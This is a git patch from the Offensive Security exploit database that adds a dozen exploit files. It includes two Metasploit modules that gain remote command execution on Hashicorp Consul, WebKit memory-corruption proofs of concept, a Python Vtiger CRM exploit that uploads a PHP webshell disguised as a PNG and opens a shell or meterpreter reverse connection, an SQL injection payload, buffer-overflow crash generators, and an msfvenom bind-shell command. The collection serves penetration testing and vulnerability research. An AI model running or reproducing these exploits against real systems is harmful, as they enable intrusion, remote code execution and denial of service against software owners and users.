From e8dcb9f022f05bbfcdda225038d59b87a4553575 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 3 Jan 2019 05:01:43 +0000 Subject: [PATCH] DB: 2019-01-03 12 changes to exploits/shellcodes EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) WebKit JSC - 'AbstractValue::set' Use-After-Free WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write Ayukov NFTP FTP Client 2.0 - Buffer Overflow Hashicorp Consul - Remote Command Execution via Rexec (Metasploit) Hashicorp Consul - Remote Command Execution via Services API (Metasploit) WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection Frog CMS 0.9.5 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts) WSTMart 2.0.8 - Cross-Site Scripting FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection Craft CMS 3.0.25 - Cross-Site Scripting bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload Vtiger CRM 7.1.0 - Remote Code Execution --- exploits/linux/remote/46073.rb | 176 +++++++++++++++++++++++++++ exploits/linux/remote/46074.rb | 132 ++++++++++++++++++++ exploits/multiple/dos/46071.html | 106 ++++++++++++++++ exploits/multiple/dos/46072.js | 41 +++++++ exploits/php/webapps/46027.html | 2 +- exploits/php/webapps/46065.py | 149 +++++++++++++++++++++++ exploits/php/webapps/46066.txt | 18 +++ exploits/php/webapps/46067.txt | 13 ++ exploits/windows_x86-64/dos/46064.py | 25 ++++ exploits/windows_x86-64/dos/46068.py | 28 +++++ exploits/windows_x86-64/dos/46069.py | 25 ++++ exploits/windows_x86/local/46070.py | 71 +++++++++++ files_exploits.csv | 23 +++- 13 files changed, 802 insertions(+), 7 deletions(-) create mode 100755 exploits/linux/remote/46073.rb create mode 100755 exploits/linux/remote/46074.rb create mode 100644 exploits/multiple/dos/46071.html create mode 100644 exploits/multiple/dos/46072.js create mode 100755 exploits/php/webapps/46065.py create mode 100644 exploits/php/webapps/46066.txt create mode 100644 exploits/php/webapps/46067.txt create mode 100755 exploits/windows_x86-64/dos/46064.py create mode 100755 exploits/windows_x86-64/dos/46068.py create mode 100755 exploits/windows_x86-64/dos/46069.py create mode 100755 exploits/windows_x86/local/46070.py diff --git a/exploits/linux/remote/46073.rb b/exploits/linux/remote/46073.rb new file mode 100755 index 000000000..69cce063c --- /dev/null +++ b/exploits/linux/remote/46073.rb @@ -0,0 +1,176 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Hashicorp Consul Remote Command Execution via Rexec", + 'Description' => %q{ + This module exploits a feature of Hashicorp Consul named rexec. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Bharadwaj Machiraju ', # Discovery and PoC + 'Francis Alexander ', # Discovery and PoC + 'Quentin Kaiser ' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.consul.io/docs/agent/options.html#disable_remote_exec' ], + [ 'URL', 'https://www.consul.io/docs/commands/exec.html'], + [ 'URL', 'https://github.com/torque59/Garfield' ] + ], + 'Platform' => 'linux', + 'Targets' => [ [ 'Linux', {} ] ], + 'Payload' => {}, + 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'wget', 'curl' ], + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 11 2018')) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path', '/']), + OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]), + OptInt.new('TIMEOUT', [false, 'The timeout to use when waiting for the command to trigger', 20]), + OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']), + Opt::RPORT(8500) + ]) + end + + def check + uri = target_uri.path + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "/v1/agent/self"), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + begin + agent_info = JSON.parse(res.body) + if agent_info["Config"]["DisableRemoteExec"] == false || agent_info["DebugConfig"]["DisableRemoteExec"] == false + return CheckCode::Vulnerable + else + return CheckCode::Safe + end + rescue JSON::ParserError + vprint_error 'Failed to parse JSON output.' + return CheckCode::Unknown + end + end + + def execute_command(cmd, opts = {}) + uri = target_uri.path + + print_status('Creating session.') + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(uri, 'v1/session/create'), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + }, + 'ctype' => 'application/json', + 'data' => {:Behavior => "delete", :Name => "Remote Exec", :TTL => "15s"}.to_json + }) + + if res and res.code == 200 + begin + sess = JSON.parse(res.body) + print_status("Got rexec session ID #{sess['ID']}") + rescue JSON::ParseError + fail_with(Failure::Unknown, 'Failed to parse JSON output.') + end + end + + print_status("Setting command for rexec session #{sess['ID']}") + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/job?acquire=#{sess['ID']}"), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + }, + 'ctype' => 'application/json', + 'data' => {:Command => "#{cmd}", :Wait => 2000000000}.to_json + }) + if res and not res.code == 200 or res.body == 'false' + fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.') + end + + print_status("Triggering execution on rexec session #{sess['ID']}") + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(uri, "v1/event/fire/_rexec"), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + }, + 'ctype' => 'application/json', + 'data' => {:Prefix => "_rexec", :Session => "#{sess['ID']}"}.to_json + }) + if res and not res.code == 200 + fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.') + end + + begin + Timeout.timeout(datastore['TIMEOUT']) do + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}/?keys=&wait=2000ms"), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + begin + data = JSON.parse(res.body) + break if data.include? 'out' + rescue JSON::ParseError + fail_with(Failure::Unknown, 'Failed to parse JSON output.') + end + sleep 2 + end + rescue Timeout::Error + # we catch this error so cleanup still happen afterwards + print_status("Timeout hit, error with payload ?") + end + + print_status("Cleaning up rexec session #{sess['ID']}") + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(uri, "v1/session/destroy/#{sess['ID']}"), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + + if res and not res.code == 200 or res.body == 'false' + fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.') + end + + res = send_request_cgi({ + 'method' => 'DELETE', + 'uri' => normalize_uri(uri, "v1/kv/_rexec/#{sess['ID']}?recurse="), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + + if res and not res.code == 200 or res.body == 'false' + fail_with(Failure::Unknown, 'An error occured when contacting the Consul API.') + end + end + + def exploit + execute_cmdstager() + end +end \ No newline at end of file diff --git a/exploits/linux/remote/46074.rb b/exploits/linux/remote/46074.rb new file mode 100755 index 000000000..3f5d86cce --- /dev/null +++ b/exploits/linux/remote/46074.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Hashicorp Consul Remote Command Execution via Services API", + 'Description' => %q{ + This module exploits Hashicorp Consul's services API to gain remote command + execution on Consul nodes. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Bharadwaj Machiraju ', # Discovery and PoC + 'Francis Alexander ', # Discovery and PoC + 'Quentin Kaiser ' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.consul.io/api/agent/service.html' ], + [ 'URL', 'https://github.com/torque59/Garfield' ] + ], + 'Platform' => 'linux', + 'Targets' => [ [ 'Linux', {} ] ], + 'Payload' => {}, + 'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf', 'curl', 'wget'], + 'Privileged' => false, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 11 2018')) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path', '/']), + OptBool.new('SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]), + OptString.new('ACL_TOKEN', [false, 'Consul Agent ACL token', '']), + Opt::RPORT(8500) + ]) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/v1/agent/self'), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown + end + + unless res.code == 200 + vprint_error 'Unexpected reply' + return CheckCode::Safe + end + + agent_info = JSON.parse(res.body) + + if agent_info["Config"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableScriptChecks"] == true || agent_info["DebugConfig"]["EnableRemoteScriptChecks"] == true + return CheckCode::Vulnerable + end + + CheckCode::Safe + rescue JSON::ParserError + vprint_error 'Failed to parse JSON output.' + return CheckCode::Unknown + end + + def execute_command(cmd, opts = {}) + uri = target_uri.path + service_name = Rex::Text.rand_text_alpha(5..10) + print_status("Creating service '#{service_name}'") + + # NOTE: Timeout defines how much time the check script will run until + # getting killed. Arbitrarily set to one day for now. + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri(uri, 'v1/agent/service/register'), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + }, + 'ctype' => 'application/json', + 'data' => { + :ID => "#{service_name}", + :Name => "#{service_name}", + :Address => "127.0.0.1", + :Port => 80, + :check => { + :script => "#{cmd}", + :Args => ["sh", "-c", "#{cmd}"], + :interval => "10s", + :Timeout => "86400s" + } + }.to_json + }) + unless res && res.code == 200 + fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Consul API.') + end + print_status("Service '#{service_name}' successfully created.") + print_status("Waiting for service '#{service_name}' script to trigger") + sleep(12) + print_status("Removing service '#{service_name}'") + res = send_request_cgi({ + 'method' => 'PUT', + 'uri' => normalize_uri( + uri, + "v1/agent/service/deregister/#{service_name}" + ), + 'headers' => { + 'X-Consul-Token' => datastore['ACL_TOKEN'] + } + }) + if res && res.code != 200 + fail_with(Failure::UnexpectedReply, + 'An error occured when contacting the Consul API.' + ) + end + end + + def exploit + execute_cmdstager() + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/46071.html b/exploits/multiple/dos/46071.html new file mode 100644 index 000000000..0df9466db --- /dev/null +++ b/exploits/multiple/dos/46071.html @@ -0,0 +1,106 @@ + + +// ./jsc --useConcurrentJIT=false ~/test.js + +function set(arr, value) { + arr[0] = value; +} + +function getImmutableArrayOrSet(get, value) { + let arr = [1]; + if (get) + return arr; + + set(arr, value); // This inlinee is for having checkArray not take the paths using the structure comparison. + set({}, 1); +} + +function main() { + getImmutableArrayOrSet(true); + + for (let i = 0; i < 100; i++) { + getImmutableArrayOrSet(false, {}); + } + + let arr = getImmutableArrayOrSet(true); + print(arr[0] === 1); +} + +main(); + +PoC 2 (UaF): + \ No newline at end of file diff --git a/exploits/multiple/dos/46072.js b/exploits/multiple/dos/46072.js new file mode 100644 index 000000000..63ace8690 --- /dev/null +++ b/exploits/multiple/dos/46072.js @@ -0,0 +1,41 @@ +/* +bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage) +{ + unsigned oldLength = storage->length(); + RELEASE_ASSERT(count <= oldLength); + + // If the array contains holes or is otherwise in an abnormal state, + // use the generic algorithm in ArrayPrototype. + if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this)) + || hasSparseMap() + || shouldUseSlowPut(indexingType())) { + return false; + } + + if (!oldLength) + return true; + + unsigned length = oldLength - count; + + storage->m_numValuesInVector -= count; + storage->setLength(length); + + +Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code "storage->m_numValuesInVector -= count". But that kind of arrays actually can get there by only having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So "storage->m_numValuesInVector" can be controlled by the user. + +In the PoC, it changes m_numValuesInVector to 0xfffffff0 that equals to the new length, making the hasHoles method return false, leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method. + +PoC: +*/ + +function main() { + let arr = [1]; + + arr.length = 0x100000; + arr.splice(0, 0x11); + + arr.length = 0xfffffff0; + arr.splice(0xfffffff0, 0, 1); +} + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/46027.html b/exploits/php/webapps/46027.html index 6e7d8fceb..7426fc0b2 100644 --- a/exploits/php/webapps/46027.html +++ b/exploits/php/webapps/46027.html @@ -1,4 +1,4 @@ -# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF +# Exploit Title: ZeusCart 4.0 Deactivate Customer Accounts CSRF # Date: 12/20/2018 # Exploit Author: mqt # Vendor Homepage: http://http://www.zeuscart.com/ diff --git a/exploits/php/webapps/46065.py b/exploits/php/webapps/46065.py new file mode 100755 index 000000000..7443ea2b6 --- /dev/null +++ b/exploits/php/webapps/46065.py @@ -0,0 +1,149 @@ +# Exploit Title: Vtiger CRM 7.1.0 - Remote Code Execution +# Date: 2018-12-27 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.vtiger.com +# Software Link: https://sourceforge.net/projects/vtigercrm/files/latest/download +# Version: v7.1.0 +# Category: Webapps +# Tested on: XAMPP for Linux 5.6.38-0 +# Software Description : Vtiger CRM enables sales, support, and marketing teams to +# organize and collaborate to measurably improve customer experiences and business outcomes. + +# Description : This application has the vulnerability of uploading files with the extension "php3" in the logo upload field. +# But the uploaded file must be in PNG format and size 150X40. +# We can put PHP code into image source. After you make the extension "php3", the PHP code that we've placed can work. +# Therefore, PHP code can be executed using "" Tags in PNG format file. +# ================================================================== +# I have exploited in 2 different ways. +# First one uploads a basic php shell for you and lets you control it through the console. +# Second one uploads the php meterpreter payload to the target site and lets you set this payload. + +# PoC: + +#!/usr/bin/python + +import mechanize, sys, cookielib, requests +import colorama, urllib, re, random +from colorama import Fore + +def bannerche(): + print ''' + @-------------------------------------------------------------@ + | Vtiger CRM 7.1.0 - Remote Code Execution Exploit | + | Vulnerability discovered by AkkuS | + | My Blog - https://pentest.com.tr | + @-------------------------------------------------------------@ + ''' +bannerche() + +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] +UserName = str(raw_input("User Name: ")) # Administrator Username Input +Password = str(raw_input("Password: ")) # Administrator Password Input + +print(Fore.BLUE + "+ [*] Loging in...") +br = mechanize.Browser() # set cookies +br.set_handle_robots(False) +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/") # User Access Login +assert br.viewing_html() +br.select_form(nr=0) +br.form['username'] = UserName +br.form['password'] = Password +br.submit() + +title = br.title() +if title == "Dashboard": # Access control + print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") + print (Fore.GREEN + "+ [*] Login successful") +else: + print (Fore.RED + "+ [*] User information is incorrect.") + sys.exit() +## +# Introducing Cookie and CSRF token information +## +check = requests.get("http://"+rhost+"/index.php?module=Vtiger&parent=Settings&view=CompanyDetails&block=8&fieldid=14", cookies=cj) + +doc = check.text + +finder = re.findall(r'csrfMagicToken = ".*";', doc) +csrf = finder[0].replace('csrfMagicToken = ', '').replace('"','').replace(';var csrfMagicName = __vtrftk;','').strip() +csrf_to_data = str(csrf) +print(Fore.YELLOW + "+ [*] Token = " + csrf_to_data) + +x = br._ua_handlers['_cookies'].cookiejar +c = str(x) + +sonuc = re.findall(r"([a-fA-F\d]{32})", c) +g = sonuc[0] +v = str(g) +print (Fore.YELLOW + "+ [*] PHPSESSID = " + v) +## +# Random value fetching +## + +boundary = ''.join(str(random.randint(0,9)) for _ in xrange(29)) +filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(10)) + ".php3" + +## +# EXPLOIT +## +post_cookie = {"PHPSESSID": v} +post_headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Connection": "close", + "Content-Type": "multipart/form-data; boundary=---------------------------"+boundary+""} +Basic_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n" + +print (Fore.BLUE + "+ [*] Select shell type:") +print (Fore.YELLOW +"- [*] 1 - Basic Shell") +print ("- [*] 2 - Meterpreter Shell") +choose = int(raw_input("- [*] Enter a number (1 or 2) : ")) + +if choose == 1: + Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Basic_data) + if Basic.status_code == 200: + print (Fore.GREEN + "+ [*] Shell successfully uploaded!") + print (Fore.GREEN + "+ [*] Shell Directory = http://"+rhost+"/test/logo/"+filename+"?cmd=[Command Here]") + while True: + shellctrl = requests.get("http://"+rhost+"/test/logo/"+filename+"") + if shellctrl.status_code == 200: + Command = str(raw_input(Fore.WHITE + "shell> ")) + URL = requests.get("http://"+rhost+"/test/logo/"+filename+"?cmd="+Command+"") + print URL.text + else: + print (Fore.RED + "+ [X] Unable to upload or access the shell") + sys.exit() + +elif choose == 2: + print("+ [*] In this option, you must listen to LHOST and LPORT with your Metasploit.") + print(Fore.RED + "+ [*] You should use the "+Fore.WHITE +"php/meterpreter/reverse_tcp"+Fore.RED +" payload") + print(Fore.YELLOW + "+ [*] Enter metasploit handler settings.") + + lhost = str(raw_input(Fore.WHITE + "LHOST : ")) + lport = str(raw_input(Fore.WHITE + "LPORT : ")) + + Meter_data = "-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"__vtrftk\"\r\n\r\n"+csrf_to_data+"\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"module\"\r\n\r\nVtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"parent\"\r\n\r\nSettings\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nCompanyDetailsSave\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"logo\"; filename=\""+filename+"\"\r\nContent-Type: image/png\r\n\r\n\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x02\x00\x00\x00\xfc\x18\xed\xa3\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x00`IDATH\x89c\\X\x80\x81\x81\xc1s^7\x93\xfc\x8f\x8b\xdb~_\xd3}\xaa'\xf7\xf1\xe3\xc9\xbf_\xef\x06|\xb200c\xd9\xb9g\xfd\xd9=\x1b\xce2\x8c\x82Q0\nF\xc1(\x18\x05\xa3`\x14\x8c\x82Q0\n\x86\r\x00\x00\x81\xb2\x1b\x02\x07x\r\x0c\x00\x00\x00\x00IEND\xaeB`\x82\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"organizationname\"\r\n\r\nvtiger\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n95, 12th Main Road, 3rd Block, Rajajinagar\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"city\"\r\n\r\nBangalore\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"state\"\r\n\r\nKarnataka\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"code\"\r\n\r\n560010\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"country\"\r\n\r\nIndia\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"phone\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"fax\"\r\n\r\n+91 9243602352\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"website\"\r\n\r\nwww.vtiger.com\r\n-----------------------------"+boundary+"\r\nContent-Disposition: form-data; name=\"vatid\"\r\n\r\n\r\n-----------------------------"+boundary+"--\r\n" + + Basic = requests.post("http://"+rhost+"/index.php", headers=post_headers, cookies=post_cookie, data=Meter_data) + while True: + payload = requests.get("http://"+rhost+"/test/logo/"+filename+"") + print("+ [*] Check your Metasploit Framework console") + if payload.status_code == 200: + print (Fore.GREEN + "+ [*] Payload uploaded and executed!") + + else: + print (Fore.RED + "+ [X] Unable to upload and run the payload") + sys.exit() +else: + print("Invalid input!") +# end + + +vtiger0.png \ No newline at end of file diff --git a/exploits/php/webapps/46066.txt b/exploits/php/webapps/46066.txt new file mode 100644 index 000000000..13b2a252d --- /dev/null +++ b/exploits/php/webapps/46066.txt @@ -0,0 +1,18 @@ +# Exploit Title: WordPress Plugin Adicon Server 1.2 - 'selectedPlace' SQL Injection +# Date: 2018-12-28 +# Software Link: https://wordpress.org/plugins/adicons/ +# Exploit Author: Kaimi +# Website: https://kaimi.io +# Version: 1.2 +# Category: webapps + +# SQL Injection +# File: addIcon.php +# Vulnerable code: +# $placement=$_POST['selectedPlace']; + +# $x=explode("_",$placement); +# $ck=$wpdb->get_row("select id from ".$table_prefix."adicons where adRow=".$x[0]." and adCol=".$x[1]); + +# Example payload: +selectedPlace=1 AND (SELECT * FROM (SELECT(SLEEP(1)))abcD); -- - \ No newline at end of file diff --git a/exploits/php/webapps/46067.txt b/exploits/php/webapps/46067.txt new file mode 100644 index 000000000..5fe5ee189 --- /dev/null +++ b/exploits/php/webapps/46067.txt @@ -0,0 +1,13 @@ +# Exploit Title: Frog CMS 0.9.5 - Cross-Site Scripting +# Date: 2018-12-25 +# Exploit Author:WangDudu +# Vendor Homepage: https://github.com/philippe/FrogCMS +# Software Link: https://github.com/philippe/FrogCMS +# Version:0.9.5 +# CVE :CVE-2018-20448 + +# The parameter under /install/index.php is that the Database name has reflective XSS +# 1 The Database name , username and password must be correct +# 2 You can use the exp: + + \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46064.py b/exploits/windows_x86-64/dos/46064.py new file mode 100755 index 000000000..a5ef3b1ee --- /dev/null +++ b/exploits/windows_x86-64/dos/46064.py @@ -0,0 +1,25 @@ +# Exploit Title: NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC) +# Author: Luis Martinez +# Date: 2018-12-27 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe +# Tested Version: 1.6.5.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python NBMonitor_1.6.5.0.py +# 2.- Open NBMonitor_1.6.5.0.txt and copy content to clipboard +# 3.- Open NBMonitor +# 4.- Register -> Enter Registration Code +# 5.- Paste ClipBoard on "Name:" +# 6.- Key: -> 1 +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 276 +f = open ("NBMonitor_1.6.5.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46068.py b/exploits/windows_x86-64/dos/46068.py new file mode 100755 index 000000000..2b07de399 --- /dev/null +++ b/exploits/windows_x86-64/dos/46068.py @@ -0,0 +1,28 @@ +# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC) +# Date: 2018-12-30 +# Exploit Author: Achilles +# Vendor Homepage: https://www.poikosoft.com/ +# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe +# Exploit Author: Achilles +# Tested Version: 8.0.7 (64-bit) +# Tested on: Windows 7 x64 +# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow +# Steps to Produce the Crash:=20 +# 1.- Run python code : EZ_CD_Audio_Converter.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open EZ_CD_Audio_Converter 'Press Activate' +# 4.- Paste the content of EVIL.txt into the field: 'Key' +# 5.- And you will see a crash. + +#!/usr/bin/env python + +buffer = "\x41" * 10000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/46069.py b/exploits/windows_x86-64/dos/46069.py new file mode 100755 index 000000000..5e93d7f28 --- /dev/null +++ b/exploits/windows_x86-64/dos/46069.py @@ -0,0 +1,25 @@ +# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) +# Discovery by: Luis Martinez +# Discovery Date: 2018-12-27 +# Vendor Homepage: www.nsauditor.com +# Software Link : http://www.nsauditor.com/downloads/networksleuth_setup.exe +# Tested Version: 3.0.0.0 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Crash: +# 1.- Run python code : python NetworkSleuth_3.0.0.0.py +# 2.- Open NetworkSleuth_3.0.0.0.txt and copy content to clipboard +# 3.- Open NetworkSleuth +# 4.- Register -> Enter Registration Code... +# 5.- Name: -> l4m5 +# 6.- Paste ClipBoard on "Key:" +# 7.- OK +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 276 +f = open ("NetworkSleuth_3.0.0.0.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86/local/46070.py b/exploits/windows_x86/local/46070.py new file mode 100755 index 000000000..0e018923c --- /dev/null +++ b/exploits/windows_x86/local/46070.py @@ -0,0 +1,71 @@ +# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow +# Date: 2018-12-29 +# Exploit Author: Uday Mittal +# Vendor Homepage: http://www.ayukov.com/nftp/ +# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip +# Version : below 2.0 +# Tested on: Microsoft Windows XP SP3 +# CVE: CVE-2017-15222 + +# EIP Location: 4116 +# Buffer starts from : 4121 +# 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) +# badchars: '\x00\x0A\x0D\x40' +# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 